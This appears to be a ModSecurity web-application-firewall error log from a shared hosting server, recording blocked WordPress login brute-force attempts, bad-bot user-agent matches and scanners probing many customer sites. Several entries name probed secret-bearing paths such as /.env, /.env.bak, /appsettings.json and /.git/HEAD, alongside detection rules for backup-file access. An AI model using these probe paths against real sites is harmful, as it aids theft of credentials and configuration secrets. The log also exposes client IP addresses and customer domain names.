[Tue May 26 19:14:16.255589 2026] [security2:error] [pid 18465:tid 18656] [client 136.114.56.170:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "kingsclub.in"] [uri "/index.php"] [unique_id "ahWjr06GHndkguR9cLKeXgAAPAU"]
[Tue May 26 19:14:16.259216 2026] [security2:error] [pid 18465:tid 18627] [client 57.141.2.29:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWjr06GHndkguR9cLKeigAAAB8"]
[Tue May 26 19:14:17.734581 2026] [security2:error] [pid 18465:tid 18590] [remote 143.198.203.76:52678] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.203.198.143.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bloggertarget.com"] [uri "/wp-login.php"] [unique_id "ahWjsU6GHndkguR9cLKe4QAADXw"]
[Tue May 26 19:14:18.748388 2026] [security2:error] [pid 18465:tid 18606] [client 57.141.2.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWjsk6GHndkguR9cLKfCgAAAAs"]
[Tue May 26 19:14:19.937056 2026] [security2:error] [pid 18465:tid 18707] [client 20.151.111.128:4625] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 128.111.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "glorodavionics.com"] [uri "/wp-plain.php"] [unique_id "ahWjs06GHndkguR9cLKfWQAAAG8"], referer: www.google.com
[Tue May 26 19:14:19.952659 2026] [security2:error] [pid 18465:tid 18702] [client 20.151.111.128:4639] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 128.111.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "glorodavionics.com"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahWjs06GHndkguR9cLKfXwAAAGo"], referer: www.google.com
[Tue May 26 19:14:20.647421 2026] [security2:error] [pid 18465:tid 18643] [client 57.141.2.10:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWjtE6GHndkguR9cLKfcQAAAC8"]
[Tue May 26 19:14:21.147309 2026] [security2:error] [pid 18465:tid 18682] [client 20.151.111.128:8390] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 128.111.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "glorodavionics.com"] [uri "/fzylbzzu.php"] [unique_id "ahWjtU6GHndkguR9cLKfpgAAAFY"], referer: www.google.com
[Tue May 26 19:14:21.567222 2026] [security2:error] [pid 18465:tid 18531] [remote 142.44.228.56:56902] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "koneksi.com.co"] [uri "/robots.txt"] [unique_id "ahWjtU6GHndkguR9cLKfvAAAKEE"]
[Tue May 26 19:14:21.567426 2026] [security2:error] [pid 18465:tid 18636] [client 142.44.228.56:56902] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "koneksi.com.co"] [uri "/robots.txt"] [unique_id "ahWjtU6GHndkguR9cLKfvAAAKEE"]
[Tue May 26 19:14:22.591933 2026] [security2:error] [pid 18465:tid 18658] [client 57.141.2.23:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWjtk6GHndkguR9cLKf1wAAAD4"]
[Tue May 26 19:14:23.010018 2026] [security2:error] [pid 18465:tid 18558] [remote 15.235.98.106:20378] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "koneksi.com.co"] [uri "/"] [unique_id "ahWjt06GHndkguR9cLKgBQAAZFw"]
[Tue May 26 19:14:23.010198 2026] [security2:error] [pid 18465:tid 18696] [client 15.235.98.106:20378] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "koneksi.com.co"] [uri "/"] [unique_id "ahWjt06GHndkguR9cLKgBQAAZFw"]
[Tue May 26 19:14:24.487526 2026] [security2:error] [pid 18465:tid 18668] [client 130.44.200.148:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWjuE6GHndkguR9cLKgRwAAAEg"], referer: https://www.anujtradingco.com/
[Tue May 26 19:14:25.173339 2026] [security2:error] [pid 18465:tid 18693] [client 57.141.2.25:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWjuE6GHndkguR9cLKgYgAAAGE"]
[Tue May 26 19:14:25.203819 2026] [security2:error] [pid 18465:tid 18587] [remote 91.210.171.209:46094] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 209.171.210.91.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWjuU6GHndkguR9cLKgbAAAPHk"]
[Tue May 26 19:14:25.740422 2026] [security2:error] [pid 18465:tid 18640] [client 130.44.200.148:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWjuU6GHndkguR9cLKglAAAACw"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1460166&moderation-hash=16e968c3d92b66f1f9cf970575822f5d
[Tue May 26 19:14:26.136242 2026] [security2:error] [pid 18465:tid 18626] [client 57.141.2.64:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWjuU6GHndkguR9cLKgkQAAAB4"]
[Tue May 26 19:14:26.432706 2026] [security2:error] [pid 18465:tid 18712] [client 69.171.230.36:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.haddingtonwines.com"] [uri "/index.php"] [unique_id "ahWjuU6GHndkguR9cLKgeAAAAHQ"]
[Tue May 26 19:14:26.888614 2026] [security2:error] [pid 18465:tid 18489] [remote 18.190.7.192:60772] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 192.7.190.18.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWjuk6GHndkguR9cLKgzgAASRc"]
[Tue May 26 19:14:28.819035 2026] [security2:error] [pid 18465:tid 18686] [client 57.141.2.16:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWjvE6GHndkguR9cLKhMgAAAFo"]
[Tue May 26 19:14:28.985181 2026] [security2:error] [pid 18465:tid 18661] [client 45.45.237.225:41260] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "grandconclaveindia.org.in"] [uri "/.git/HEAD"] [unique_id "ahWjvE6GHndkguR9cLKhTQAAAEE"]
[Tue May 26 19:14:28.985273 2026] [security2:error] [pid 18465:tid 18661] [client 45.45.237.225:41260] ModSecurity: Warning. Matched phrase "CCBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "grandconclaveindia.org.in"] [uri "/.git/HEAD"] [unique_id "ahWjvE6GHndkguR9cLKhTQAAAEE"]
[Tue May 26 19:14:28.991012 2026] [security2:error] [pid 18465:tid 18601] [client 130.44.200.148:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWjvE6GHndkguR9cLKhTAAAAAY"], referer: https://anujtradingco.com
[Tue May 26 19:14:29.072709 2026] [security2:error] [pid 18465:tid 18620] [client 45.45.237.225:41252] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "grandconclaveindia.org.in"] [uri "/.env"] [unique_id "ahWjvU6GHndkguR9cLKhVwAAABg"]
[Tue May 26 19:14:29.072822 2026] [security2:error] [pid 18465:tid 18620] [client 45.45.237.225:41252] ModSecurity: Warning. Matched phrase "CCBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "grandconclaveindia.org.in"] [uri "/.env"] [unique_id "ahWjvU6GHndkguR9cLKhVwAAABg"]
[Tue May 26 19:14:29.224185 2026] [security2:error] [pid 18465:tid 18626] [client 45.45.237.225:41244] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "grandconclaveindia.org.in"] [uri "/.env.bak"] [unique_id "ahWjvU6GHndkguR9cLKhXQAAAB4"]
[Tue May 26 19:14:29.298003 2026] [security2:error] [pid 18465:tid 18674] [client 45.45.237.225:41244] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "grandconclaveindia.org.in"] [uri "/.env.backup"] [unique_id "ahWjvU6GHndkguR9cLKhaQAAAE4"]
[Tue May 26 19:14:29.346440 2026] [security2:error] [pid 18465:tid 18680] [client 45.45.237.225:41466] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "grandconclaveindia.org.in"] [uri "/appsettings.json"] [unique_id "ahWjvU6GHndkguR9cLKhbAAAAFQ"]
[Tue May 26 19:14:29.346561 2026] [security2:error] [pid 18465:tid 18680] [client 45.45.237.225:41466] ModSecurity: Warning. Matched phrase "CCBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "grandconclaveindia.org.in"] [uri "/appsettings.json"] [unique_id "ahWjvU6GHndkguR9cLKhbAAAAFQ"]
[Tue May 26 19:14:29.503797 2026] [security2:error] [pid 18465:tid 18683] [client 45.45.237.225:41392] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "grandconclaveindia.org.in"] [uri "/gci-ranks-past.php"] [unique_id "ahWjvU6GHndkguR9cLKhigAAAFc"]
[Tue May 26 19:14:29.503909 2026] [security2:error] [pid 18465:tid 18683] [client 45.45.237.225:41392] ModSecurity: Warning. Matched phrase "CCBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "grandconclaveindia.org.in"] [uri "/gci-ranks-past.php"] [unique_id "ahWjvU6GHndkguR9cLKhigAAAFc"]
[Tue May 26 19:14:29.561373 2026] [security2:error] [pid 18465:tid 18686] [client 45.45.237.225:41336] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.237.45.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/gci-ltsj.php"] [unique_id "ahWjvU6GHndkguR9cLKhhQAAAFo"]
[Tue May 26 19:14:29.562381 2026] [security2:error] [pid 18465:tid 18690] [client 45.45.237.225:41476] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.237.45.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/gci-evolution.php"] [unique_id "ahWjvU6GHndkguR9cLKhhgAAAF4"]
[Tue May 26 19:14:29.569872 2026] [security2:error] [pid 18465:tid 18633] [client 45.45.237.225:41274] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.237.45.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/gci-downloads-annualreports.php"] [unique_id "ahWjvU6GHndkguR9cLKhjgAAACU"]
[Tue May 26 19:14:29.574175 2026] [security2:error] [pid 18465:tid 18672] [client 45.45.237.225:41430] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.237.45.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/gci-grandofficers.php"] [unique_id "ahWjvU6GHndkguR9cLKhiwAAAEw"]
[Tue May 26 19:14:29.574883 2026] [security2:error] [pid 18465:tid 18664] [client 45.45.237.225:41438] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.237.45.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/gci-india.php"] [unique_id "ahWjvU6GHndkguR9cLKhhwAAAEQ"]
[Tue May 26 19:14:29.575137 2026] [security2:error] [pid 18465:tid 18634] [client 45.45.237.225:41360] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.237.45.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/gci-downloads-forms.php"] [unique_id "ahWjvU6GHndkguR9cLKhjQAAACY"]
[Tue May 26 19:14:29.576307 2026] [security2:error] [pid 18465:tid 18596] [client 45.45.237.225:41380] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.237.45.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/gci-contact.php"] [unique_id "ahWjvU6GHndkguR9cLKhjwAAAAE"]
[Tue May 26 19:14:29.634122 2026] [security2:error] [pid 18465:tid 18678] [client 45.45.237.225:41454] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.237.45.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/gci-website-terms.php"] [unique_id "ahWjvU6GHndkguR9cLKhmAAAAFI"]
[Tue May 26 19:14:29.634794 2026] [security2:error] [pid 18465:tid 18610] [client 45.45.237.225:41312] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.237.45.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/gci-website-disclaimer.php"] [unique_id "ahWjvU6GHndkguR9cLKhmQAAAA8"]
[Tue May 26 19:14:29.642283 2026] [security2:error] [pid 18465:tid 18620] [client 45.45.237.225:41320] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "grandconclaveindia.org.in"] [uri "/gci-website-privacy.php"] [unique_id "ahWjvU6GHndkguR9cLKhmgAAABg"]
[Tue May 26 19:14:29.642367 2026] [security2:error] [pid 18465:tid 18620] [client 45.45.237.225:41320] ModSecurity: Warning. Matched phrase "CCBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "grandconclaveindia.org.in"] [uri "/gci-website-privacy.php"] [unique_id "ahWjvU6GHndkguR9cLKhmgAAABg"]
[Tue May 26 19:14:29.677180 2026] [security2:error] [pid 18465:tid 18665] [client 45.45.237.225:41370] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.237.45.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/index.php"] [unique_id "ahWjvU6GHndkguR9cLKhiAAAAEU"]
[Tue May 26 19:14:29.678657 2026] [security2:error] [pid 18465:tid 18683] [client 45.45.237.225:41416] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.237.45.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/gci-conclaves.php"] [unique_id "ahWjvU6GHndkguR9cLKhjAAAAFc"]
[Tue May 26 19:14:29.688421 2026] [security2:error] [pid 18465:tid 18656] [client 45.45.237.225:41302] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.237.45.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/gci-downloads-constitution.php"] [unique_id "ahWjvU6GHndkguR9cLKhiQAAADw"]
[Tue May 26 19:14:30.132067 2026] [security2:error] [pid 18465:tid 18533] [remote 123.30.233.13:40466] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.233.30.123.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWjvU6GHndkguR9cLKhsAAAZUM"]
[Tue May 26 19:14:30.839457 2026] [security2:error] [pid 18465:tid 18682] [client 57.141.2.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWjvk6GHndkguR9cLKhxgAAAFY"]
[Tue May 26 19:14:31.473689 2026] [security2:error] [pid 18465:tid 18556] [remote 123.30.233.13:40466] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.233.30.123.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWjv06GHndkguR9cLKiCAAASFo"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 19:14:31.904216 2026] [security2:error] [pid 18465:tid 18685] [client 43.173.181.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWjvk6GHndkguR9cLKh7AAAAFk"]
[Tue May 26 19:14:32.935088 2026] [security2:error] [pid 18465:tid 18621] [client 57.141.2.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWjwE6GHndkguR9cLKiQgAAABk"]
[Tue May 26 19:14:34.343327 2026] [security2:error] [pid 18465:tid 18696] [client 57.141.2.70:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWjwU6GHndkguR9cLKiggAAAGQ"]
[Tue May 26 19:14:34.444930 2026] [security2:error] [pid 18465:tid 18608] [client 185.191.171.13:23988] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/category/no-school-december/day/2024-08-06/"] [unique_id "ahWjwk6GHndkguR9cLKimAAAAA0"]
[Tue May 26 19:14:34.445078 2026] [security2:error] [pid 18465:tid 18608] [client 185.191.171.13:23988] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/category/no-school-december/day/2024-08-06/"] [unique_id "ahWjwk6GHndkguR9cLKimAAAAA0"]
[Tue May 26 19:14:36.253315 2026] [security2:error] [pid 18465:tid 18693] [client 45.148.10.16:47970] ModSecurity: Access denied with code 406 (phase 1). Pattern match "^POST$" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "187"] [id "900401"] [msg "PHP Spam Botnet"] [hostname "www.shop.taotechservices.com"] [uri "/"] [unique_id "ahWjxE6GHndkguR9cLKi8wAAAGE"]
[Tue May 26 19:14:36.393636 2026] [security2:error] [pid 18465:tid 18660] [client 114.119.155.154:38033] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "traderscafe.in"] [uri "/robots.txt"] [unique_id "ahWjxE6GHndkguR9cLKjAQAAAEA"]
[Tue May 26 19:14:37.106488 2026] [security2:error] [pid 18465:tid 18657] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWjxE6GHndkguR9cLKjBwAAAD0"]
[Tue May 26 19:14:39.076399 2026] [security2:error] [pid 18465:tid 18702] [client 57.141.2.38:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWjxk6GHndkguR9cLKjbAAAAGo"]
